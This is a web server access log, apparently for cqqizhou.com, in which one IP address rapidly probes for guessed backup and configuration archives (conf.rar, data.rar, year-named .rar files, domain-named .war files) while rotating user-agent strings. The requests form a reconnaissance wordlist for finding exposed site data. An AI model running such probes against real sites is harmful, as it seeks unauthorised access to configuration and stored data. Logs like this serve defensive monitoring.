160.202.230.95 - - [23/Jul/2026:20:27:47 +0800] "GET /application.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:48 +0800] "GET /conf.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:49 +0800] "GET /target.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:51 +0800] "GET /upload.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:52 +0800] "GET /data.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:54 +0800] "GET /attachment.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:55 +0800] "GET /2026.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:57 +0800] "GET /2025.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:58 +0800] "GET /2024.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:00 +0800] "GET /2023.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:01 +0800] "GET /2022.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:03 +0800] "GET /2021.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:04 +0800] "GET /2020.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:05 +0800] "GET /www.cqqizhou.com.war HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:07 +0800] "GET /cqqizhou.com.war HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:20:28:08 +0800] "POST /wp-cron.php?doing_wp_cron=1784809688.4519240856170654296875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.95 - - [23/Jul/2026:20:28:08 +0800] "GET /cqqizhou.war HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:10 +0800] "GET /www.war HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:12 +0800] "GET /2026.war HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:28:13 +0800] "GET /web.war HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
